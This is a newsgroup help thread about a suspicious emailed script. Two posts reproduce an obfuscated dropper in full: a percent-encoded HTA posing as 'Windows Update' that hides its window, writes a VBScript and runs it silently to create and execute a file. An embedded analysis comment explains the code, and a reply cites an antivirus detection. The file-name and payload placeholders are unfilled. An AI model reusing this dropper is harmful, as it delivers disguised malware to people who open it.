wtf is this? i got this by email today! help?


Anonymous

<!-- HTML Source Code Protected By: <http://www.DesignerWiz.com> FREE HTML Source Code Encryption Protection -->
<!--
  Analysis note (defensive reading of the sample below):
  The "protection" is plain URL percent-encoding. unescape() reverses it and
  document.write() injects the result into the page, so nothing here is encrypted.
  Decoded, the text is an HTA page titled "Windows Update". Its HTA:APPLICATION
  settings turn off the caption, system menu and taskbar entry and start the
  window minimized.
  The VBScript in it uses Scripting.FileSystemObject to write a second script file
  (placeholder szHTAVbsName), starts that file through WScript.Shell.Run with
  window style 0 (hidden), and the page then calls window.close() on itself.
  The generated script writes the elements of an array to a file one chr() at a
  time (placeholder szHTAFileName) and runs that file. No network request appears
  anywhere in the decoded text.
  The file names and the byte array are still unfilled builder placeholders
  (',szHTAVbsName,' and ',szHTAFileName,' and Array(',0')), so this copy carries
  no payload.
  The string literal is also split across two lines in the middle of a %20 escape,
  which stops the script from parsing as posted; presumably a line-wrap artifact.
  Handling: do not open the attachment. Mail that delivers an HTA or script which
  hides its window and then writes and runs files should be treated as malicious.
  Behaviours worth alerting on: the HTA host (mshta.exe) starting a script host or
  another program, and FileSystemObject file creation followed by Shell.Run.
-->
<script>
<!--
document.write(unescape("%3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3EWindows%20Update%3C/TITLE%3E%0D%0A%3CHTA%3AAPPLICATION%20ID%3D%22Q%22%20APPLICATIONNAME%3D%22Q%22%20BORDER%3D%22none%22%20BORDERSTYLE%3D%22normal%22%20CAPTION%3D%22no%22%20ICON%3D%22%22%20CONTEXTMENU%3D%22no%22%20MAXIMIZEBUTTON%3D%22no%22%20MINIMIZEBUTTON%3D%22no%22%20SHOWINTASKBAR%3D%22no%22%20SINGLEINSTANCE%3D%22no%22%20SYSMENU%3D%22no%22%20VERSION%3D%221.0%22%20WINDOWSTATE%3D%22minimize%22/%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0D%0AMyFile%20%3D%20%22%27%2CszHTAVbsName%2C%27%22%0D%0ASet%20FSO%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0D%0ASet%20TSO%20%3D%20FSO.CreateTextFile%28MyFile%2C%20True%29%0D%0ATSO.write%20%22dim%20filesys%2C%20filetxt%2C%20getname%2C%20path%2C%20textfile%2C%20i%22%20%26%20vbcrlf%0D%0ATSO.write%20%22textfile%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filesys%20%3D%20CreateObject%28%22%22Scripting.FileSystemObject%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filetxt%20%3D%20filesys.CreateTextFile%28textfile%2C%20True%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22getname%20%3D%20filesys.GetFileName%28path%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20a%22%20%26%20vbcrlf%0D%0ATSO.write%20%22a%3DArray%28%27%2C0%27%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22for%20i%3D0%20to%20%27%2C0%27%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Write%28chr%28a%28i%29%29%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22next%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Close%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20z%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20zz%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Const%20ForReading%20%3D%201%2C%20ForWriting%20%3D%202%2C%20ForAppending%20%3D%203%22%20%26%20vbcrlf%0D%0ATSO.write%20%22const%20RemoteExe%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22set%20zz%20%3D%20wscript.createobject%28%22%22wscript.shell%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22z%
20%3D%20zz.run%20%28%22%22%27%2CszHTAFileName%2C%27%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22wscript.quit%22%20%26%20vbcrlf%0D%0ASet%20TSO%20%3D%20Nothing%0D%0ASet%20FSO%20%3D%20Nothing%0D%0ADim%20WshShell%0D%0ASet%20WshShell%20%3D%20CreateObject%28%22WScript.Shell%22%29%0D%0AWshShell.Run%20%22%27%2CszHTAVbsName%2C%27%22%2C%200%2C%20false%0D%0A%3C/SCRIPT%3E%0D%0A%3Cscript%3Ewindow.close%28%29%3C/script%3E%0D%0A%3C/HEAD%3E%0D%0A%3C/HTML%3E"));
//-->
</script>
 

Adam Piggott

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
<!-- HTML Source Code Protected By: <http://www.DesignerWiz.com> FREE
HTML Source Code Encryption Protection --> <script> <!--
document.write(unescape("%3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3EWindows%20Update%3C/TITLE%3E%0D%0A%3CHTA%3AAPPLICATION%20ID%3D%22Q%22%20APPLICATIONNAME%3D%22Q%22%20BORDER%3D%22none%22%20BORDERSTYLE%3D%22normal%22%20CAPTION%3D%22no%22%20ICON%3D%22%22%20CONTEXTMENU%3D%22no%22%20MAXIMIZEBUTTON%3D%22no%22%20MINIMIZEBUTTON%3D%22no%22%20SHOWINTASKBAR%3D%22no%22%20SINGLEINSTANCE%3D%22no%22%20SYSMENU%3D%22no%22%20VERSION%3D%221.0%22%20WINDOWSTATE%3D%22minimize%22/%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0D%0AMyFile%20%3D%20%22%27%2CszHTAVbsName%2C%27%22%0D%0ASet%20FSO%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0D%0ASet%20TSO%20%3D%20FSO.CreateTextFile%28MyFile%2C%20True%29%0D%0ATSO.write%20%22dim%20filesys%2C%20filetxt%2C%20getname%2C%20path%2C%20textfile%2C%20i%22%20%26%20vbcrlf%0D%0ATSO.write%20%22textfile%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filesys%20%3D%20CreateObject%28%22%22Scripting.FileSystemObjec t%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filetxt%20%3D%20filesys.CreateTextFile%28textfile%2C%20True%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22getname%20%3D%20filesys.GetFileName%28path%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20a%22%20%26%20vbcrlf%0D%0ATSO.write%20%22a%3DArray%28%27%2C0%27%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22for%20i%3D0%20to%20%27%2C0%27%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Write%28chr%28a%28i%29%29%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22next%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Close%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20z%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20zz%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Const%20ForReading%20%3D%201%2C%20ForWriting%20%3D%202%2C%20ForAppending%20%3D%203%22%20%26%20vbcrlf%0D%0ATSO.write%20%22const%20RemoteExe%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22set%20zz%20%3D%20wscript.createobject%28%22%22wscript.shell%22%22%29%22%20%26%20vbcrlf
%0D%0ATSO.write%20%22z%20%3D%20zz.run%20%28%22%22%27%2CszHTAFileName%2C%27%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22wscript.quit%22%20%26%20vbcrlf%0D%0ASet%20TSO%20%3D%20Nothing%0D%0ASet%20FSO%20%3D%20Nothing%0D%0ADim%20WshShell%0D%0ASet%20WshShell%20%3D%20CreateObject%28%22WScript.Shell%22%29%0D%0AWshShell.Run%20%22%27%2CszHTAVbsName%2C%27%22%2C%200%2C%20false%0D%0A%3C/SCRIPT%3E%0D%0A%3Cscript%3Ewindow.close%28%29%3C/script%3E%0D%0A%3C/HEAD%3E%0D%0A%3C/HTML%3E"));
//--> </script>

Looks like an attempt to create a program that downloads a virus. Either
it's broken or your email client has altered some of the code, as it does
not quite "unravel" properly.
- --
Adam Piggott, Proprietor, Proactive Services (Computing).
http://www.proactiveservices.co.uk/

Please replace dot invalid with dot uk to email me.
Apply personally for PGP public key.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFGOFu+7uRVdtPsXDkRAjVFAJwLLRY94++oGXkfIDcDBa0PGf7scACff0c/
CpltbiQiJsZZrRA3XkKP9Ok=
=uK3O
-----END PGP SIGNATURE-----
 

Ron Lopshire

Anonymous said:
<!-- HTML Source Code Protected By: <hxxp://www.DesignerWiz.com> FREE HTML Source Code Encryption Protection -->
<script>
<!--
document.write(unescape("*******************"));
//-->
</script>

Please don't post this crap without munging it. Not everyone around here
is savvy enough to keep Javascript disabled.

KAV did not like your post, says it is this.

http://www.viruslist.com/en/viruses/encyclopedia?virusid=49958

I cannot send the sample to the Virus Total and/or Jotti online services
without disabling all of my protection. You can submit the sample using
email if you would like another opinion.

http://www.virustotal.com/en/indexx.html

http://virusscan.jotti.org/

Both servers are swamped at the moment.

Ron :)
 
